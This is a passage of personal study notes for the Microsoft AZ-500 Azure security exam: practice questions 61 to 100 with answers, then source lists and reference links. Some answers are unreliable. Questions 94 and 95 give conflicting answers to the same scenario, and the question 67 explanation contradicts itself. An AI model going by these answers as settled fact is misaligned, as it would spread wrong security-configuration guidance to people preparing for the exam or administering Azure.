                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-61","title":"Question 61","text":"

                            You are implementing an Azure Kubernetes Service (AKS) cluster for a production workload. You need to ensure that the cluster meets the following requirements:

                            • Provides the highest networking performance possible
                            • Manages ingress traffic by using Kubernetes tools

                            What should you use? Select only one answer.

                            • CNI networking with Azure load balancers
                            • CNI networking with ingress resources and controllers
                            • Kubenet networking with Azure load balancers
                            • Kubenet networking with ingress resources and controllers
                            See response

                            CNI networking provides the best performance since it does not require IP forwarding and UDR, and ingress controllers can be managed from within Kuberbetes. Kubenet networking requires defined routes and IP forwarding, making the network slower. Azure load balancers cannot be managed by using Kubernetes tools.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-62","title":"Question 62","text":"

                            You have an Azure subscription that contains a virtual machine named VM1. VM1 is configured with just-in-time (JIT) VM access. You need to request access to VM1. Which PowerShell cmdlet should you run? Select only one answer.

                            • Add-AzNetworkSecurityRuleConfig
                            • Get-AzJitNetworkAccessPolicy
                            • Set-AzJitNetworkAccessPolicy
                            • Start-AzJitNetworkAccessPolicy
                            See response

                            The\u00a0start-AzJitNetworkAccesspolicy\u00a0PowerShell cmdlet is used to request access to a JIT-enabled virtual machine.\u00a0Set-AzJitNetworkAccessPolicy\u00a0is used to enable JIT on a virtual machine.\u00a0Get-AzJitNetworkAccessPolicy\u00a0and\u00a0Add-AzNetworkSecurityRuleConfig\u00a0are not used to start a request access.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-63","title":"Question 63","text":"

                            You create a role by using the following JSON.

                            {\n  \"Name\": \"Virtual Machine Operator\",\n  \"Id\": \"88888888-8888-8888-8888-888888888888\",\n  \"IsCustom\": true,\n  \"Description\": \"Can monitor and restart virtual machines.\",\n  \"Actions\": [\n    \"Microsoft.Storage/*/read\",\n    \"Microsoft.Network/*/read\",\n    \"Microsoft.Compute/virtualMachines/start/action\",\n    \"Microsoft.Compute/virtualMachines/restart/action\",\n    \"Microsoft.Authorization/*/read\",\n    \"Microsoft.ResourceHealth/availabilityStatuses/read\",\n    \"Microsoft.Resources/subscriptions/resourceGroups/read\",\n    \"Microsoft.Insights/alertRules/*\",\n    \"Microsoft.Insights/diagnosticSettings/*\",\n    \"Microsoft.Support/*\"\n  ],\n  \"NotActions\": [],\n  \"DataActions\": [],\n  \"NotDataActions\": [],\n  \"AssignableScopes\": [\"/subscriptions/*\"]\n}\n

                            A user that is part of the new role reports that they are unable to restart a virtual machine by using a PowerShell script. What should you do to ensure that the user can restart the virtual machine?

                            • Add\u00a0Microsoft.Compute/virtualMachines/login/action\u00a0to the list of\u00a0DataActions\u00a0in the custom role.
                            • Add\u00a0Microsoft.Compute/*/read\u00a0to the list of\u00a0Actions\u00a0in the role.
                            See response

                            The role needs read access to virtual machines to restart them. The user does not need to authenticate again for the role to be in effect, and the user will not be able to access the virtual machine from the portal. Adding\u00a0Microsoft.Compute/virtualMachines/login/action\u00a0to the list of\u00a0DataActions\u00a0in the role allows the user to sign in as a user, but not to restart the virtual machine.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-64","title":"Question 64","text":"

                            You have a Linux virtual machine in an on-premises datacenter that is used as a forwarder for Microsoft Sentinel by using CEF-formatted logs. The timestamp on events retrieved from the forwarder is the time the agent on the forwarder received the event, not the time the event occurred on the system it came from. You need to ensure that Microsoft Sentinel receives the time the event was generated. What should you do? Select only one answer.

                            • Run\u00a0cef_gather_info.py\u00a0on CEF forwarder.
                            • Run\u00a0cef_gather_info.py\u00a0on each system that sends events to the forwarder.
                            • Run\u00a0TimeGenerated.py\u00a0on each system that sends events to the forwarder.
                            • Run\u00a0TimeGenerated.py\u00a0on the CEF forwarder.
                            See response

                            Running\u00a0TimeGenerated.py\u00a0on the CEF forwarder changes the logging on the forwarder to the use the event time instead of the time the event was received by the agent on the forwarder. Running\u00a0TimeGenerated.py\u00a0on each system will not change the way events are logged on the forwarder. Running\u00a0cef_gather_info.py\u00a0gathers data, but it does not change the timestamp.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-65","title":"Question 65","text":"

                            You configure a Linux virtual machine to send Syslog data to Microsoft Sentinel. You notice that events for the virtual machine are duplicated in Microsoft Sentinel. You need to ensure that the events are not duplicated. Which two actions should you perform? Each correct answer presents part of the solution. Select all answers that apply.

                            • Disable the synchronization of the Log Analytics agent with the Syslog configuration in Microsoft Sentinel.
                            • Disable the Syslog daemon from listening to network messages.
                            • Enable the Syslog daemon to listen to network messages.
                            • Remove the entry used to send CEF messages from the Syslog configuration file for the virtual machine.
                            • Stop the Syslog daemon on the virtual machine.
                            See response

                            You must disable CEF messages on the virtual machine and prevent the setting to send CEF messages from being read. Stopping the Syslog daemon on the virtual machine will stop the virtual machine from sending both Syslog and CEF messages. Enabling the Syslog daemon to listen and disabling the Syslog daemon from listening to network messages does not handle the duplication of events.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-66","title":"Question 66","text":"

                            You are configuring automatic key rotation for an encryption key stored in Azure Key Vault. You need to implement an alert to be triggered five days before the keys are rotated. What should you use? Select only one answer.

                            • an action group alert
                            • Application Insights
                            • Azure Event Grid
                            • Microsoft Defender for Key Vault
                            See response

                            Using Event Grid triggers the\u00a0Microsoft.KeyVault.CertificateNearExpiry\u00a0event. Key Vault cannot be monitored by using Application Insights. Defender for Key Vault is used to alert for unusual and unplanned activities. Key Vault key expiration cannot be monitored by using action group alerts.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-67","title":"Question 67","text":"

                            You have an Azure subscription that contains an Azure container registry named ACR1 and a user named User1. You need to ensure that User1 can administer images in ACR1. The solution must follow the principle of least privilege. Which two roles should you assign to User1? Each correct answer presents part of the solution. Select all answers that apply.

                            • AcrDelete
                            • AcrImageSigner
                            • AcrPull
                            • AcrPush
                            • Contributor
                            • Reader
                            See response

                            To administer images in ACR1, a user must be able to push and pull images to ACR1 and delete images from ACR1. The AcrPush and AcrDelete roles are required to push, pull, and delete images in ACR1. AcrPull only allows the Push image permission, not pull. Contributor can also perform these operations, however it also has many additional permissions, which means that it does not follow the principle of least privilege. Reader and AcrImageSigner do not have adequate permissions.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-68","title":"Question 68","text":"

                            You need to allow only Azure AD-authenticated principals to access an existing Azure SQL database. Which three actions should you perform? Each correct answer presents part of the solution. Select all answers that apply.

                            • Add an Azure AD administrator.
                            • Assign your account the SQL Security Manager built-in role.
                            • Connect to the database by using Microsoft SQL Server Management Studio (SSMS).
                            • Connect to the database by using the Azure portal.
                            • Select\u00a0Support only Azure Active Directory authentication for this server.
                            See response

                            Adding an Azure AD administrator and assigning your account the SQL Security Manager built-in role are prerequisites for enabling Azure AD-only authentication. Selecting Support only Azure AD authentication for this server enforces the Azure SQL logical server to use Azure AD authentication. A connection to the data plane of the logical server is not needed.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-69","title":"Question 69","text":"

                            You manage Azure AD for a retail company. You need to ensure that employees using shared Android tablets can use passwordless authentication when accessing the Azure portal. Which authentication method should you use? Select only one answer.

                            • the Microsoft Authenticator app
                            • security keys
                            • Windows Hello
                            • Windows Hello for Business
                            See response

                            You can only use the Microsoft Authenticator app or one-time password login on shared devices. Windows Hello can only be used for Windows devices. You cannot use security keys on shared devices.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-70","title":"Question 70","text":"

                            You need to configure passwordless authentication. The solution must follow the principle of least privilege. Which role should assign to complete the task? Select only one answer.

                            • Authentication Administrator
                            • Authentication Policy Administrator
                            • Global Administrator
                            • Security Administrator
                            See response

                            Configuring authentication methods requires Global Administrator privileges. Security administrators have permissions to manage other security-related features. Authentication policy administrators can configure the authentication methods policy, tenant-wide multi-factor authentication (MFA) settings, and password protection policy. Authentication administrators can set or reset any authentication methods, including passwords, for non-administrators and some roles.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-71","title":"Question 71","text":"

                            You manage Azure AD. You disable the Users can register applications option in Azure AD. A user reports that they are unable to register an application. You need to ensure that that the user can register applications. The solution must follow the principle of least privilege. What should you do? Select only one answer.

                            • Assign the Application Developer role to the user.
                            • Assign the Authentication Administrator role to the user.
                            • Assign the Cloud App Security Administrator role to the user.
                            • Enable the Users can register applications option.
                            See response

                            The Application Developer role has permissions to register an application even if the Users can register applications option is disabled. The Users can register applications option allows any user to register an application. The Authentication Administrator role and the Cloud App Security Administrator role do not follow the principle of least privilege.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-72","title":"Question 72","text":"

                            You have a virtual network that contains an Azure Kubernetes Service (AKS) workload and an internal load balancer. Multiple virtual networks are managed by multiple teams. You are unable to change any of the IP addresses. You need to ensure that clients from virtual networks in your Azure subscription can access the AKS cluster by using the internal load balancer. What should you do? Select only one answer.

                            • Create a private link endpoint on the virtual network and instruct users to access the cluster by using a private link endpoint on their virtual network.
                            • Create a private link service on the virtual network and instruct users to access the cluster by using a private link endpoint in their virtual networks.
                            • Create virtual network peering between the virtual networks to allow connectivity.
                            • Create VPN site-to-site (S2S) connections between the virtual networks to allow connectivity.
                            See response

                            A private link service will allow access from outside the virtual network to an endpoint by using NAT. Since you do not control the IP addressing for other virtual networks, this ensures connectivity even if IP addresses overlap. Once a private link service is used in the load balancer, other users can create a private endpoint on virtual networks to access the load balancer.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-73","title":"Question 73","text":"

                            You have an Azure subscription that contains a virtual machine named VM1. VM1 runs a web app named App1. You need to protect App1 by implementing Web Application Firewall (WAF). What resource should you deploy? Select only one answer.

                            • Azure Application Gateway
                            • Azure Firewall
                            • Azure Front Door
                            • Azure Traffic Manager
                            See response

                            WAF is a tier of Application Gateway. If you want to deploy WAF, you must deploy Application Gateway and select the WAF or WAF V2 tier.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-74","title":"Question 74","text":"

                            You have an Azure AD tenant that uses the default setting. You need to prevent users from a domain named contoso.com from being invited to the tenant. What should you do? Select only one answer.

                            • Deploy Azure AD Privileged Identity Management (PIM).
                            • Edit the Access review settings.
                            • Edit the Collaboration restrictions settings.
                            • Enable security defaults.
                            See response

                            After you edit the Collaboration restrictions settings, if you try to invite a user from a blocked domain, you cannot. Security defaults and PIM do not affect guest invitation privileges. By default, the Allow invitations to be sent to any domain (most inclusive) setting is enabled. In this case, you can invite B2B users from any organization.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-75","title":"Question 75","text":"

                            Your company has an Azure Active Directory (Azure AD) tenant named whizlab.com. The company wants to deploy a service named \u201cGetcloudskillsserver\u201d that would run on a virtual machine running Windows Server 2016. The service needs to authenticate to the tenant and access Microsoft Graph to read the directory data. You need to delegate the minimum required permissions for the service. Which of the following steps would you perform in Azure? Choose 3 answers from the options below.

                            • Add an app registration.
                            • Grant Application Permissions.
                            • Add application permission.
                            • Configure an Azure AD Application Proxy.
                            • Add delegated permission.
                            See response

                            Add an app registration. (Correct) Grant Application Permissions. (Correct) Add application permission. (Correct) Configure an Azure AD Application Proxy. (Incorrect) Add delegated permission. (Incorrect) First, you need to add an application registration. When it comes to the types of permissions, you have to use Application permissions for services. And then, finally, you grant the required permissions.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-76","title":"Question 76","text":"

                            In order to get diagnostics from an Azure virtual machine you own, what is the first step to doing that?

                            • A diagnostics agent needs to be installed on the VM
                            • You need to create a storage account to store it
                            • You need to grant RBAC\u00a0permissions to the user requesting diagnostics
                            See response

                            You need to create a storage account to store it

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-77","title":"Question 77","text":"

                            Being the network engineer at your company, you need to ensure that communications with Azure Storage pass through the Service Endpoint. How would you ensure it?

                            • By adding an Inbound rule to allow access to the storage
                            • By adding one Inbound rule and one Outbound rule
                            • By adding an Outbound rule to allow access to the storage
                            • You don't need to make a specific configuration or add any rule, it is automatically configured.
                            See response

                            By adding an Outbound rule to allow access to the storage. Inbound/outbound network security group rules can be created to deny traffic from/to the Internet and allow traffic from/to AzureCloud or other available service tags of particular Azure services.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-78","title":"Question 78","text":"

                            You need to recommend a solution for encrypting data at rest and in transit for your company's database. Which of the following would you recommend?

                            • Azure storage encryption
                            • Transparent Data Encryption
                            • Always Encrypted
                            • SSL certificates
                            See response

                            Always Encrypted.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-79","title":"Question 79","text":"

                            A company wants to synchronize its on-premises Active Directory with its Azure AD tenant. They want to set up a solution that would minimize the need for additional hardware deployment. They also want to ensure that they can keep their current login restrictions. It includes logon hours for their current Active Directory users. Which authentication method should they implement?

                            • Azure AD Connect and Pass-through authentication
                            • Federated identity using Azure Directory Federation Services
                            • Azure AD Connect and Password hash synchronization
                            • Azure AD Connect and Federated authentication
                            See response

                            Azure AD Connect and Pass-through authentication. Since we need to minimize additional hardware deployments, we can use Azure AD Connect to synchronize Active Directory users with Azure AD.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-80","title":"Question 80","text":"

                            You must specify whether the following statement is TRUE or FALSE: You are an administrator at getcloudskills.com and responsible for managing user accounts on Azure Active Directory. In order to leverage Azure administrative units, do you need an Azure Active Directory Premium License for each Administrative Unit member?

                            • True
                            • False
                            See response

                            False. To manage/use administrative units you need an Azure Active Directory premium license only for each Administrative Unit admin and you can use a free license for unit members.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-81","title":"Question 81","text":"

                            A development team has published an application onto an Azure Web App service. They want to enable Azure AD authentication for the web application. They have to perform an application registration in Azure AD. Which of the following are required when you configure the App service for Azure AD authentication? Choose two answers from the options given below.

                            • Client ID
                            • Logout URL
                            • Subscription ID
                            • Tenant ID
                            See response

                            Client ID and Tenant ID

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-82","title":"Question 82","text":"

                            You decide to use Azure Front Door for defining, managing, and monitoring the global routing for your web traffic and optimizing end-user reliability and performance via quick global failover. From the below-given list, choose the features that is not supported by Azure Front Door.

                            • Redirect HTTPS traffic to HTTP using URL redirect
                            • Web Application Firewall
                            • URL path-based routing
                            See response

                            Redirect HTTPS traffic to HTTP using URL redirect

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-83","title":"Question 83","text":"

                            If no rules other than the default NSG rules are in place, are VMs on SubnetA and SubnetB be able to connect to the Internet?

                            • Yes
                            • No
                            See response

                            Yes. The Outbound rules contain a Rule with the name \u201cAllowInternetOutBound\u201d. This would allow all Outbound traffic to the Internet.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-84","title":"Question 84","text":"

                            Your company has a set of Azure SQL databases hosted on a logical server. They want to enable SQL auditing for the database. Which of the following can be used to store the audit logs? Choose 3 answers from the options given below.

                            • Azure Log Analytics
                            • Azure SQL database
                            • Azure Event Hubs
                            • Azure Storage accounts
                            • Azure SQL data warehouse
                            See response

                            Azure Log Analytics, Azure Event Hubs and Azure Storage accounts

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-85","title":"Question 85","text":"

                            Your organization is looking to increase its security posture. Which of the following would you implement to reduce the reliance on passwords and increase account security?

                            • Entra ID B2C
                            • Multi-factor Authentication (MFA)
                            • Passwordless Authentication
                            • Entra ID Directory Roles
                            See response

                            Multi-factor Authentication (MFA) and Passwordless Authentication. Multi-factor Authentication (MFA) enhances security by requiring two or more verification methods. Passwordless authentication allows users to sign in without a password, instead using methods like the Microsoft Authenticator app.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-86","title":"Question 86","text":"

                            Which of the following is designed to ban certain passwords from being used, ensuring users avoid easily guessable and vulnerable passwords?

                            • Entra ID Identity Protection
                            • Entra ID Password Protection
                            • Entra ID MFA
                            • Entra ID B2B
                            See response

                            Entra ID Password Protection. Entra ID Password Protection helps you establish comprehensive defense against weak passwords in your environment. It bans certain passwords and sets lockout settings to prevent malicious attempts.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-87","title":"Question 87","text":"

                            You're setting up an application to use Microsoft Entra ID for authentication. Which of the following are essential components you would need to create or configure in Microsoft Entra ID?

                            • Application Registration
                            • OAuth token grant
                            • Azure Policy
                            See response

                            Application Registration and OAuth token grant. When you register an app with Microsoft Entra ID, you're creating an identity configuration for the app that allows it to integrate with the Entra ID identity service. A service principal is an identity created for use with applications, hosted services, and automated tools to access Azure resources.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-88","title":"Question 88","text":"

                            You need to restrict access to your Azure Storage account such that it can only be accessed from a specific subnet within your Azure Virtual Network. Which feature should you utilize?

                            • Private Link services
                            • Virtual Network Service Endpoints
                            • Azure Functions
                            • Azure SQL Managed Instance
                            See response

                            Virtual Network Service Endpoints. Virtual Network Service Endpoints extend your virtual network private address space and the identity of your VNet to the Azure services, over a direct connection. Endpoints allow you to secure your critical Azure service resources to only your virtual networks.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-89","title":"Question 89","text":"

                            Which of the following Azure services offer built-in Distributed Denial of Service (DDoS) protection to secure your applications?

                            • Azure Firewall
                            • Azure Application Gateway
                            • Azure DDoS Protection Standard
                            • Azure Front Door
                            See response

                            Azure Application Gateway, Azure DDoS Protection Standard and Azure Front Door. Azure Application Gateway offers DDoS protection as part of its WAF (Web Application Firewall) feature. c. Azure DDoS Protection Standard provides advanced DDoS mitigation capabilities. Azure Front Door provides both DDoS protection and Web Application Firewall for its global HTTP/HTTPS endpoints.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-90","title":"Question 90","text":"

                            You have been assigned to enhance the security and compliance of your organization's Azure SQL Database. Which of the following measures can you adopt to encrypt data and audit database operations?

                            • Transparent Database Encryption (TDE)
                            • Azure SQL Database Always Encrypted
                            • Azure Blob Soft Delete
                            • Enable database auditing
                            See response

                            Transparent Database Encryption (TDE) and Enable database auditing. Transparent Database Encryption (TDE) encrypts SQL Server, Azure SQL Database, and Azure Synapse Analytics data files. Database auditing tracks database events and writes them to an audit log in your Azure storage account.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-91","title":"Question 91","text":"

                            You need to centralize the management of security configurations for multiple Azure subscriptions. Which Azure service should you utilize to ensure consistent application of configurations?

                            • Entra ID
                            • Azure Key Vault
                            • Azure Blueprint
                            • Azure Landing Zone
                            See response

                            Azure Blueprint. Azure Blueprint enables organizations to define a repeatable set of Azure resources that adheres to specific requirements and standards. It allows consistent application of configurations across multiple subscriptions.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-92","title":"Question 92","text":"

                            You are an Azure security specialist who has been tasked with setting up and maintaining the security monitoring within the organization. Which of the following tasks can be accomplished with Microsoft Sentinel?

                            • Monitor security events using Azure Monitor Logs
                            • Automate response to specific security threats
                            • Customize analytics rules to identify potential threats
                            • Deploy virtual machines in Azure
                            • Evaluate and manage generated alerts
                            See response

                            Monitor security events using Azure Monitor Logs, Automate response to specific security threats, Customize analytics rules to identify potential threats and Evaluate and manage generated alerts. a. Microsoft Sentinel uses Azure Monitor Logs for security events, enabling users to monitor these events. b. Microsoft Sentinel offers automation features to respond to detected security threats. c. One of the features of Microsoft Sentinel is the ability to customize analytics rules, helping in the detection of potential threats. d. Deploying virtual machines is a task within Azure and isn't specifically a function of Microsoft Sentinel. e. Microsoft Sentinel generates alerts based on its analytics, and users can evaluate and manage these alerts within the platform.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-93","title":"Question 93","text":"

                            You have a hybrid configuration of Azure Active Directory (Azure AD). You have an Azure HDInsight cluster on a virtual network. You plan to allow users to authenticate to the cluster by using their on-premises Active Directory credentials. You need to configure the environment to support the planned authentication. Solution: You deploy the On-premises data gateway to the on-premises network. Does this meet the goal?

                            • Yes
                            • No
                            See response

                            No.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-94","title":"Question 94","text":"

                            Your company has an Azure subscription name Subscription1 that contains the users shown in the following table:

                            Name Role User1 Global Administrator User2 Billing Administrator User3 Owner User4 Account Admin

                            The company is sold to a new owner. The company needs to transfer ownership of Suscription1. Which user can transfer the ownership and which tool should the user use? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.

                            Select user:

                            • User1
                            • User2
                            • User3
                            • User4

                            Select tool:

                            • Azure Account Center
                            • Azure Cloud Shell
                            • Azure PowerShell
                            • Azure Security Center
                            See response

                            User2. Azure Account Center.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-95","title":"Question 95","text":"

                            Your company has an Azure subscription name Subscription1. Subscription1 is associated with the Azure Active Directory tenant that includes the users shown in the following table:

                            Name Role User1 Global Administrator User2 Billing Administrator User3 Owner User4 Account Admin

                            The company is sold to a new owner. The company needs to transfer ownership of Suscription1. Which user can transfer the ownership and which tool should the user use? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.

                            Select user:

                            • User1
                            • User2
                            • User3
                            • User4

                            Select tool:

                            • Azure Account Center
                            • Azure Cloud Shell
                            • Azure PowerShell
                            • Azure Security Center
                            See response

                            User1. Azure Account Center.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-96","title":"Question 96","text":"

                            The CIS Microsoft Azure Foundations Security Benchmark provides several recommended best practices related to identify and access management. Each of the following is a best practice except for this one?

                            • Avoid unnecessary guest user accounts in Azure Active Directory.
                            • Enable Azure Multi-Factor Authentication (MFAA).
                            • Establish intervals for reviewing user authentication methods.
                            • Enable Self-Service Group Management.
                            See response

                            Enable Self-Service Group Management.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-97","title":"Question 97","text":"

                            You have an Azure Active Directory (Azure AD) tenant that contains the users shown in the following table.

                            Name Member of a group Multi-factor authentication (MFA) status User1 Group1, Group2 Enabled User2 Group1 Disabled

                            You create and enforce an Azure AD Identity Protection sign-in risk policy that has the following settings:

                            • Assignments: Include Group 1, exclude Group2
                            • Conditions: Sign-in risk level: Low and above
                            • Access: Allow access, Require multi-factor authentication.

                            You need to identify what occurs when the users sign in to Azure AD. What should you identify for each user? To answer, select the apropriate options in the answer area. NOTE: Each correct selection is worth one point.

                            When User1 signs in from an anonymous IP address, the user will:

                            • Be blocked.
                            • Be prompted for MFA.
                            • Sign in by using a username and password only.

                            When User2 signs in from an unfamiliar location, the user will:

                            • Be blocked.
                            • Be prompted for MFA.
                            • Sign in by using a username and password only.
                            See response

                            User1 will be prompted for MFA. User2 will be blocked

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-98","title":"Question 98","text":"

                            You have an Azure subscription that contains the virtual machines shown in the following table

                            Name Location Virtual network name VM1 East US VNet1 VM2 West US VNet2 VM3 East US VNet1 VM4 West US VNet3

                            All the virtual networks are peered. You deploy Azure Bastion to VNet2. Which virtual machines can be protected by the bastion host?

                            • VM1, VM2, VM3, and VM4.
                            • VM1, VM2, and VM3 only.
                            • VM2 and VM4 only.
                            • VM2 only.
                            See response

                            VM1, VM2, VM3, and VM4.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-99","title":"Question 99","text":"

                            You have an Azure subscription that contains the Azure virtual machines shown in the following table

                            Name Operating System VM1 Windows 10 VM2 Windows Server 2016 VM3 Windows Server 2019 VM4 Ubuntu Server 18.04 LTS

                            You create an MDM Security Baseline profile named Profile1. You need to identify to which virtual machines Profile1 can be applied. Which virtual machines should you identify?

                            • VM1, VM2, VM3, and VM4.
                            • VM1, VM2, and VM3 only.
                            • VM1 and VM3 only.
                            • VM1 only.
                            See response

                            VM1 only.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-100","title":"Question 100","text":"

                            You have an Azure subscription named Sub1. You create a virtual network that contains one subnet. On the subnet, you provision the virtual machines shown in the following table.

                            Name Network Interface Application security group assignment IP address VM1 NIC1 Appgroup12 10.0.0.10 VM2 NIC2 Appgroup12 10.0.0.11 VM3 NIC3 Appgroup3 10.0.0.100 VM4 NIC4 Appgroup4 10.0.0.200

                            Currently, you have not provisioned any network security group (NSGs). You need to implement network security to meet the following requirements:

                            • Allow traffic to VM4 from VM3 only.
                            • Allow traffic from the Internet to VM1 and VM2.
                            • Minimize the number of NSGs and network security rules.

                            How many NSGs and network security rules should you create? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.

                            NSGs:

                            • 1
                            • 2
                            • 3
                            • 4

                            **Network security rules: **

                            • 1
                            • 2
                            • 3
                            • 4
                            See response

                            NSGs: 2. Network security rules: 3.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-keep-learning/","title":"AZ-500 Microsoft Azure Security Technologies Certificate - keep learning","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-keep-learning/#az-500-microsoft-azure-security-technologies-certificate-keep-learning","title":"AZ-500 Microsoft Azure Security Technologies Certificate: keep learning","text":"Sources of this notes
                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
                            • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
                            • Udemy course: Azure Security: AZ-500 (updated July 2023)
                            Summary: AZ-500 Microsoft Azure Security Engineer Certification
                            • About the certificate
                            • I. Manage Identity and Access
                            • II. Platform protection
                            • III. Data and applications
                            • IV. Security operations
                            • AZ-500 and more: keep learning

                            Cheatsheets: Azure-CLI | Azure PowerShell

                            100 questions you should pass for the AZ-500 certificate

                            In addition to completing the course work in the AZ-500 learning path, you should also be sure to read the following reference articles from Microsoft:

                            • Manage Azure Active Directory groups and group membership
                            • Configure Microsoft Entra Verified ID verifier
                            • Block legacy authentication with Azure AD with Conditional Access
                            • Microsoft Entra Permissions Management
                            • What are access reviews?
                            • Register an app with Azure Active Directory
                            • Application and service principal objects in Azure Active Directory
                            • Virtual network traffic routing
                            • Azure SQL Database and Azure Synapse IP firewall rules
                            • Networking considerations for App Service Environment
                            • Create a virtual network for Azure SQL Managed Instance
                            • Add and manage TLS/SSL certificates in Azure App Service
                            • Observability in Azure Container Apps
                            • Choose how to authorize access to blob data in the Azure portal
                            • Authorize access to tables using Azure Active Directory
                            • Choose how to authorize access to queue data in the Azure portal
                            • Configure immutability policies for blob versions
                            • Bring your own key details for Azure Information Protection
                            • Enable infrastructure encryption for double encryption of data
                            • Define and assign a blueprint in the portal
                            • What is an Azure landing zone?
                            • Dedicated HSM FAQ
                            • Improve your regulatory compliance
                            • Customize the set of standards in your regulatory compliance dashboard
                            • Create custom Azure security initiatives and policies
                            • Plan your Defender for Servers deployment
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-preparation/","title":"AZ-500 Azure Security Engineer: Notes on the certification","text":"Sources of this notes
                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
                            • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
                            • Udemy course: Azure Security: AZ-500 (updated July 2023)
                            Summary: AZ-500 Microsoft Azure Security Engineer Certification
                            • About the certificate
                            • I. Manage Identity and Access
                            • II. Platform protection
                            • III. Data and applications
                            • IV. Security operations
                            • AZ-500 and more: keep learning

                            Cheatsheets: Azure-CLI | Azure PowerShell

                            100 questions you should pass for the AZ-500 certificate

                            These are some of the requirements for facing the az-500 highlighted by some experts:

                            • Have previously taken the Azure Administrator: AZ-103/104 course.
                            • A minimum of 1 year experience with Azure.
                            • Understand concepts of virtual machines, resource groups and Azure AD.

                            Since I only had two vouchers for azure certifications in 2023 and I had already spent one on the AZ-900, and I focused myself on the AZ-500, but first I completed the AZ-104 trainings. These are my notes for this AZ-104 not-certificated learning.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-preparation/#differences-between-the-az-500-and-the-sc-900-certification","title":"Differences between the AZ-500 and the SC-900 certification","text":"

                            The Exam AZ-500: Microsoft Azure Security Technologies is focused on Azure Security Engineer implements, manages, and monitors security for resources in Azure, multi-cloud, and hybrid environments as part of an end-to-end infrastructure. This Certification contains security components and configurations to protect identity & access, data, applications, and networks.

